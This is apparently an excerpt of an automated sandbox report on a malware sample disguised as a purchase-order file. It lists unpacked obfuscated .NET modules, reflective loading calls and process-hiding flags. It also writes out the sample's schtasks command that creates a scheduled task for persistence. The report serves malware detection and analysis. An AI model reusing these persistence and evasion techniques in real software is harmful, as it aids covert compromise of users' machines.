                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.cs | .Net Code: lJKwEEFCCA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.cs | .Net Code: lJKwEEFCCA System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_0133C56B push cs; retf 0_2_0133C56E
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_0133C7D3 push es; retf 0_2_0133C7D6
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_0133C653 push cs; retf 0_2_0133C656
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_01334659 push edx; retf 0002h 0_2_0133465A
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_013346BB push edx; retf 0002h 0_2_013346BE
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_0133C6AB push cs; retf 0_2_0133C6AE
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Code function: 0_2_01335F28 pushad ; retf 0002h 0_2_01336109
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00414A13 push edi; retf 8_2_00414A14
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041837B pushad ; retf 8_2_0041837C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D30D push 0CC2BE08h; iretd 8_2_0040D335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004073F6 push 0000003Ch; iretd 8_2_004073F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00403510 push eax; ret 8_2_00403512
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00401F55 push esi; iretd 8_2_00401F58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0156225F pushad ; ret 8_2_015627F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_015627FA pushad ; ret 8_2_015627F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_015909AD push ecx; mov dword ptr [esp], ecx 8_2_015909B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0156283D push eax; iretd 8_2_01562858
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0156135E push eax; iretd 8_2_01561369
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00EFC54F push 8B00E867h; ret 14_2_00EFC554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00EFC54D pushfd ; ret 14_2_00EFC54E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00EFC9D7 push edi; ret 14_2_00EFC9D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00EB09AD push ecx; mov dword ptr [esp], ecx 14_2_00EB09B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00E81368 push eax; iretd 14_2_00E81369
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00F07E99 push ecx; ret 14_2_00F07EAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00E81FEC push eax; iretd 14_2_00E81FED
                      Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_044B27FA pushad ; ret 18_2_044B27F9
                      Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_044B225F pushad ; ret 18_2_044B27F9
                      Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_044B283D push eax; iretd 18_2_044B2858
                      Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_044E09AD push ecx; mov dword ptr [esp], ecx 18_2_044E09B6
                      Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_0050C191 push edi; retf 18_2_0050C194
                      Source: C:\Windows\SysWOW64\runas.exe | Code function: 18_2_00510811 push edi; retf 18_2_00510813
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: section name: .text entropy: 7.830225763539746
                      Source: STiokuWkiGFJ.exe.0.dr | Static PE information: section name: .text entropy: 7.830225763539746
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, tdcDZMypNH7PsaTCGo.cs | High entropy of concatenated method names: 'H6JVaXkxc3', 'Iq1VgETuyl', 'WtlVowIyeC', 'PjEV5H1LOp', 'AJqVBPnKY2', 'LoFVtpXadO', 'eGBVv7v6IK', 'JFVVJJRCoA', 'E07VM7YseP', 'RXNVH2S04g'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, xrInpeof3ckfb86fea.cs | High entropy of concatenated method names: 'XPgXnF9l5g', 'IulX0DmRF7', 'FmbXbRSfwG', 'y48X8ZtMeL', 'd25XpdijKu', 'bB6bitPuBk', 'eqab9BLtEK', 'pZIbelQyTX', 'XacbLYGDMJ', 'DnvbIfktYO'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, M3QGeQ5V12q50oqTBB.cs | High entropy of concatenated method names: 'PebWXUn1y0rR0gtWLO1', 'xla6j4nEQwaRM3tX44f', 'uBAX4qSdKQ', 'mgyXfU1HcU', 'EgmXsqvHw8', 'g5CsvcnuIgFZmctTH21', 'EIhk9TnFS74dIUGy29H'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, aQhDVYZZFMpEXCVf19P.cs | High entropy of concatenated method names: 'w01sqWwDYX', 'NjIszLMuZo', 'dHQC2Nxos6', 'JZYCZlS8Dd', 'A3mCNLgnLG', 'kK5Ch817kC', 'R7yCwSXFsh', 'YDFCnqM8se', 'rEaC1T11XY', 'q5xC00xwEI'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yV0CmLZwt7NHJnaqf2U.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L39xfdWqVB', 'bGfxsDeWwQ', 'Pw3xCFM7w6', 'NgexxQWcB5', 'HA4xSBgybn', 'KxpxUgDgZH', 'GYRxdVljoY'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, sMVw2TvGvGBQ4b3d1C.cs | High entropy of concatenated method names: 'DVn810Qrte', 'Isi8D5i9r2', 'Mcg8XKZl5Y', 'YYnXqxsU9Q', 'xRKXzkiPhE', 'g7s82K4ORE', 'yms8ZgsyiM', 'Mis8NKyr4B', 'rhU8hgWQkN', 'QWC8wbaEsK'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, NVM2dOjp1O3yFqPMB9.cs | High entropy of concatenated method names: 'A638WcA5MV', 'CCc8QZoQQ2', 'hbG8EiAELx', 'D7K8GGle67', 'OAV87xMx1O', 'rEh8OksbYt', 'bA18cD8ZqH', 'V0U8aspjIV', 'Uk28gouG6W', 'M428rqLb2f'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, UXq1PwgSddWZQg1sZM.cs | High entropy of concatenated method names: 'lUfDGLKp4Q', 'xjWDOGgICk', 'NMhDap9wq3', 'B5hDgZIIbI', 'sNrDFCWoZF', 'gZwDAOP5ol', 'IQpD35jIrq', 'MDsD4OIBkK', 'txqDfyJMgi', 'HgDDsdeqYE'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, pFSoN1z3pxWU5hdNRQ.cs | High entropy of concatenated method names: 'vPVsOpjw1f', 'Pi8saKAAXd', 'igRsg7HxxM', 'ntvso2DknO', 'pFus5rejTl', 'X52sBKUWg2', 'VI7stcVJk2', 'lk3sddsEpa', 'YnnsWoKP8N', 'AVAsQA8fJr'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, dD6GVGel8bIfjJyH7L.cs | High entropy of concatenated method names: 'MjEfFuOgJ5', 'TGjf3753e1', 'PCKff9kTN5', 'wLTfCYrfw2', 'bNLfSmaIa9', 'HaGfd5Qqj5', 'Dispose', 'Fy7415ER9x', 'RxM40W5AKL', 'c8A4DalSc4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, dCWYAFqcdDpAFf8lJt.cs | High entropy of concatenated method names: 'oRosDiZwkO', 'FyusbBZ8RV', 'Fl9sXBnGV9', 'Vvhs88SGV8', 'zJlsfDfOma', 'llCsp3TmkH', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, LPA1IJuLJBxY70yDDT.cs | High entropy of concatenated method names: 'ToString', 'WhfAHQFiCW', 'jCsA5yVJ2p', 'tBAAmuTjab', 'DT2ABXK3kg', 'i3GAtYbDSF', 'MILAk2k7ND', 'WhWAv2bNgj', 'gnrAJ64qip', 'W1oAjm6Wnx'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, KTGL4SwXccYyCYLGV0.cs | High entropy of concatenated method names: 'Oh3Z8RBbpx', 'G88Zp5KWSe', 'dSdZ6dWZQg', 'fsZZYM4QVr', 'J4HZFnKWrI', 'epeZAf3ckf', 'ROxQi0bneSi55S6AC7', 'LU9y5YoV8WYMbKeW4N', 'LSBZZiKEdI', 'tTLZhfK9kA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, POwgeGNxX5Om6Ffrsc.cs | High entropy of concatenated method names: 'PxAE7uKsO', 'BesG7Wg0W', 'eFTOUeHCU', 'a5Qc6mjI1', 'uQigB2P1J', 'OMJrXktXA', 'YceV0uIqKymQXOe1MU', 'ShI35Pxv4GGcQIGC5N', 'rO04CXoMS', 'JMIsWdG26'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, qRBbpxao885KWSeQTv.cs | High entropy of concatenated method names: 'VJ70TwABh2', 'zTU0R7kXZy', 'kgW0uiqnbh', 'lZh0PIs36O', 'Hhe0iQ9edl', 'Tkx097VSi4', 'vgY0e97oDg', 'BaR0LsMukl', 'DtW0IdNbTS', 'yCV0qe1cqU'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.cs | High entropy of concatenated method names: 'WOMhnoPUDh', 'c9Zh1Tak1w', 'QJIh0wCekT', 'WtfhDX3PVI', 'E8mhb4rL3P', 'gZphX0KSO1', 'vQeh86x4jb', 'UPrhplhQAf', 'gfghlMxgMl', 'fRyh6UaBhA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, o0L1oYTtJX6tuEJMB8.cs | High entropy of concatenated method names: 'fPVFMnTUNM', 'iQYFKTEeCk', 'AwwFTDvnuw', 'xMXFROS79B', 'sXqF5NC8cy', 'vmZFmtpftG', 'K7bFBmQu19', 'bd7Fto2ywn', 'WJ0FkWXkJI', 'eXtFvAtsYS'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, q4Pwbb0EbenHeorNd0.cs | High entropy of concatenated method names: 'Dispose', 'iIfZIjJyH7', 'y5ZN5bcxiL', 'lxI8vdLbj1', 'W4AZqFsa6P', 'vwGZzshncp', 'ProcessDialogKey', 'GHuN2ag8RX', 'z3hNZ1sSbk', 'PL5NNwCWYA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, Sag8RXIE3h1sSbkKL5.cs | High entropy of concatenated method names: 'EPbfoVuNkI', 'SpCf5HiWUV', 'EGTfmTm7I4', 'qUAfBwBDLf', 'nBuftKPpDW', 'snqfkbPsfZ', 'kbAfvVFqH8', 'tb5fJ97OEK', 'rGcfjAikrg', 'NSvfMSIFt4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, i7e9RTPBnEL3cyZlCg.cs | High entropy of concatenated method names: 'Idv36H7aa0', 'kSt3YBCeTJ', 'ToString', 'sVI31X7xLT', 'zGl30BO22W', 'p863DVrlcT', 'jUo3bCt6rK', 'GLa3XHscOv', 'iop38Yri5t', 'A4y3pErhCd'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, rQVr3OrkNTVjQt4HnK.cs | High entropy of concatenated method names: 'UTLb7d9fHL', 'EMbbc1TUrR', 'M7SDmoUB5V', 'zbtDB5Psq7', 'nTqDt1TQZA', 'gD3DkHIvMu', 'T7QDvqQjvl', 'BYlDJV8WWO', 'LxBDj41ZCr', 'KItDMTxgvv'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, LdK1519uUXtTWRlaaa.cs | High entropy of concatenated method names: 'CsY3LeQaZ5', 'uKv3q4PDtg', 'Tvo42UI2NW', 'VdD4ZArpTi', 'pCr3HsabtO', 'lyr3Kp3fAD', 'Bv13y1JPSU', 'KQZ3Tl9hDe', 'fLx3RyoUtQ', 'Y7d3uPL7IL'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, tdcDZMypNH7PsaTCGo.cs | High entropy of concatenated method names: 'H6JVaXkxc3', 'Iq1VgETuyl', 'WtlVowIyeC', 'PjEV5H1LOp', 'AJqVBPnKY2', 'LoFVtpXadO', 'eGBVv7v6IK', 'JFVVJJRCoA', 'E07VM7YseP', 'RXNVH2S04g'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, xrInpeof3ckfb86fea.cs | High entropy of concatenated method names: 'XPgXnF9l5g', 'IulX0DmRF7', 'FmbXbRSfwG', 'y48X8ZtMeL', 'd25XpdijKu', 'bB6bitPuBk', 'eqab9BLtEK', 'pZIbelQyTX', 'XacbLYGDMJ', 'DnvbIfktYO'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, M3QGeQ5V12q50oqTBB.cs | High entropy of concatenated method names: 'PebWXUn1y0rR0gtWLO1', 'xla6j4nEQwaRM3tX44f', 'uBAX4qSdKQ', 'mgyXfU1HcU', 'EgmXsqvHw8', 'g5CsvcnuIgFZmctTH21', 'EIhk9TnFS74dIUGy29H'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, aQhDVYZZFMpEXCVf19P.cs | High entropy of concatenated method names: 'w01sqWwDYX', 'NjIszLMuZo', 'dHQC2Nxos6', 'JZYCZlS8Dd', 'A3mCNLgnLG', 'kK5Ch817kC', 'R7yCwSXFsh', 'YDFCnqM8se', 'rEaC1T11XY', 'q5xC00xwEI'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yV0CmLZwt7NHJnaqf2U.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L39xfdWqVB', 'bGfxsDeWwQ', 'Pw3xCFM7w6', 'NgexxQWcB5', 'HA4xSBgybn', 'KxpxUgDgZH', 'GYRxdVljoY'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, sMVw2TvGvGBQ4b3d1C.cs | High entropy of concatenated method names: 'DVn810Qrte', 'Isi8D5i9r2', 'Mcg8XKZl5Y', 'YYnXqxsU9Q', 'xRKXzkiPhE', 'g7s82K4ORE', 'yms8ZgsyiM', 'Mis8NKyr4B', 'rhU8hgWQkN', 'QWC8wbaEsK'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, NVM2dOjp1O3yFqPMB9.cs | High entropy of concatenated method names: 'A638WcA5MV', 'CCc8QZoQQ2', 'hbG8EiAELx', 'D7K8GGle67', 'OAV87xMx1O', 'rEh8OksbYt', 'bA18cD8ZqH', 'V0U8aspjIV', 'Uk28gouG6W', 'M428rqLb2f'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, UXq1PwgSddWZQg1sZM.cs | High entropy of concatenated method names: 'lUfDGLKp4Q', 'xjWDOGgICk', 'NMhDap9wq3', 'B5hDgZIIbI', 'sNrDFCWoZF', 'gZwDAOP5ol', 'IQpD35jIrq', 'MDsD4OIBkK', 'txqDfyJMgi', 'HgDDsdeqYE'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, pFSoN1z3pxWU5hdNRQ.cs | High entropy of concatenated method names: 'vPVsOpjw1f', 'Pi8saKAAXd', 'igRsg7HxxM', 'ntvso2DknO', 'pFus5rejTl', 'X52sBKUWg2', 'VI7stcVJk2', 'lk3sddsEpa', 'YnnsWoKP8N', 'AVAsQA8fJr'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, dD6GVGel8bIfjJyH7L.cs | High entropy of concatenated method names: 'MjEfFuOgJ5', 'TGjf3753e1', 'PCKff9kTN5', 'wLTfCYrfw2', 'bNLfSmaIa9', 'HaGfd5Qqj5', 'Dispose', 'Fy7415ER9x', 'RxM40W5AKL', 'c8A4DalSc4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, dCWYAFqcdDpAFf8lJt.cs | High entropy of concatenated method names: 'oRosDiZwkO', 'FyusbBZ8RV', 'Fl9sXBnGV9', 'Vvhs88SGV8', 'zJlsfDfOma', 'llCsp3TmkH', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, LPA1IJuLJBxY70yDDT.cs | High entropy of concatenated method names: 'ToString', 'WhfAHQFiCW', 'jCsA5yVJ2p', 'tBAAmuTjab', 'DT2ABXK3kg', 'i3GAtYbDSF', 'MILAk2k7ND', 'WhWAv2bNgj', 'gnrAJ64qip', 'W1oAjm6Wnx'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, KTGL4SwXccYyCYLGV0.cs | High entropy of concatenated method names: 'Oh3Z8RBbpx', 'G88Zp5KWSe', 'dSdZ6dWZQg', 'fsZZYM4QVr', 'J4HZFnKWrI', 'epeZAf3ckf', 'ROxQi0bneSi55S6AC7', 'LU9y5YoV8WYMbKeW4N', 'LSBZZiKEdI', 'tTLZhfK9kA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, POwgeGNxX5Om6Ffrsc.cs | High entropy of concatenated method names: 'PxAE7uKsO', 'BesG7Wg0W', 'eFTOUeHCU', 'a5Qc6mjI1', 'uQigB2P1J', 'OMJrXktXA', 'YceV0uIqKymQXOe1MU', 'ShI35Pxv4GGcQIGC5N', 'rO04CXoMS', 'JMIsWdG26'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, qRBbpxao885KWSeQTv.cs | High entropy of concatenated method names: 'VJ70TwABh2', 'zTU0R7kXZy', 'kgW0uiqnbh', 'lZh0PIs36O', 'Hhe0iQ9edl', 'Tkx097VSi4', 'vgY0e97oDg', 'BaR0LsMukl', 'DtW0IdNbTS', 'yCV0qe1cqU'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.cs | High entropy of concatenated method names: 'WOMhnoPUDh', 'c9Zh1Tak1w', 'QJIh0wCekT', 'WtfhDX3PVI', 'E8mhb4rL3P', 'gZphX0KSO1', 'vQeh86x4jb', 'UPrhplhQAf', 'gfghlMxgMl', 'fRyh6UaBhA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, o0L1oYTtJX6tuEJMB8.cs | High entropy of concatenated method names: 'fPVFMnTUNM', 'iQYFKTEeCk', 'AwwFTDvnuw', 'xMXFROS79B', 'sXqF5NC8cy', 'vmZFmtpftG', 'K7bFBmQu19', 'bd7Fto2ywn', 'WJ0FkWXkJI', 'eXtFvAtsYS'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, q4Pwbb0EbenHeorNd0.cs | High entropy of concatenated method names: 'Dispose', 'iIfZIjJyH7', 'y5ZN5bcxiL', 'lxI8vdLbj1', 'W4AZqFsa6P', 'vwGZzshncp', 'ProcessDialogKey', 'GHuN2ag8RX', 'z3hNZ1sSbk', 'PL5NNwCWYA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, Sag8RXIE3h1sSbkKL5.cs | High entropy of concatenated method names: 'EPbfoVuNkI', 'SpCf5HiWUV', 'EGTfmTm7I4', 'qUAfBwBDLf', 'nBuftKPpDW', 'snqfkbPsfZ', 'kbAfvVFqH8', 'tb5fJ97OEK', 'rGcfjAikrg', 'NSvfMSIFt4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, i7e9RTPBnEL3cyZlCg.cs | High entropy of concatenated method names: 'Idv36H7aa0', 'kSt3YBCeTJ', 'ToString', 'sVI31X7xLT', 'zGl30BO22W', 'p863DVrlcT', 'jUo3bCt6rK', 'GLa3XHscOv', 'iop38Yri5t', 'A4y3pErhCd'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, rQVr3OrkNTVjQt4HnK.cs | High entropy of concatenated method names: 'UTLb7d9fHL', 'EMbbc1TUrR', 'M7SDmoUB5V', 'zbtDB5Psq7', 'nTqDt1TQZA', 'gD3DkHIvMu', 'T7QDvqQjvl', 'BYlDJV8WWO', 'LxBDj41ZCr', 'KItDMTxgvv'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, LdK1519uUXtTWRlaaa.cs | High entropy of concatenated method names: 'CsY3LeQaZ5', 'uKv3q4PDtg', 'Tvo42UI2NW', 'VdD4ZArpTi', 'pCr3HsabtO', 'lyr3Kp3fAD', 'Bv13y1JPSU', 'KQZ3Tl9hDe', 'fLx3RyoUtQ', 'Y7d3uPL7IL'
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | File created: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Process information set: NOOPENFILEERRORBOX  (42 identical entries)
                      Source: C:\Windows\SysWOW64\runas.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX  (5 identical entries)

                      Malware Analysis System Evasion

                      Source: Yara match  File source: Process Memory Space: Pre Alert PO TVKJEANSA00967.bat.exe PID: 7480, type: MEMORYSTR
                      Source: Yara match  File source: Process Memory Space: STiokuWkiGFJ.exe PID: 8064, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\runas.exe  API/Special instruction interceptor: Address: 7FFE2220DA44
